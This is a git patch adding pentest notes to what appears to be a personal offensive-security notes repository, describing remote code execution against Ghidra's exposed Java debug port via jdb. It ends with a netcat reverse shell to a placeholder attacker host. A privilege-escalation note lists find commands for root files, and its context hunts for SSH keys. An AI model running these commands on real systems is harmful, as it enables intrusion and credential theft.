From b45e18400ae702488b170936db5995c3f4e8ad48 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Mon, 3 Jan 2022 00:43:31 +0100
Subject: [PATCH] added ghidra debugger exploit

---
 exploit/java/ghidra_debug.md                  | 19 +++++++++++++++++++
 .../priv_esc/docs/linux_priv_esc.md           |  4 ++++
 2 files changed, 23 insertions(+)
 create mode 100644 exploit/java/ghidra_debug.md

diff --git a/exploit/java/ghidra_debug.md b/exploit/java/ghidra_debug.md
new file mode 100644
index 0000000..c688d64
--- /dev/null
+++ b/exploit/java/ghidra_debug.md
@@ -0,0 +1,19 @@
+# Ghidra Debug RCE
+
+* If debug mode is enabled, connect to it via `jdb`
+```sh
+jdb -attach $TARGET_IP:$TARGET_PORT
+```
+```sh
+classpath
+classes
+```
+* Stop the service
+```sh
+stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
+```
+* Wait until the breakpoint hits and start a reverse shell
+```sh
+print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
+```
+
diff --git a/post_exploitation/priv_esc/docs/linux_priv_esc.md b/post_exploitation/priv_esc/docs/linux_priv_esc.md
index a9d83e0..c290ec1 100644
--- a/post_exploitation/priv_esc/docs/linux_priv_esc.md
+++ b/post_exploitation/priv_esc/docs/linux_priv_esc.md
@@ -34,6 +34,10 @@ find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
     ```
     * [Shared object injection](../../../exploit/linux/shared_object_injection.md)
     * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
+* User specific files
+```sh
+find / -user root -name "*.txt"
+```
 
 ## Sudo Binary
 * [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)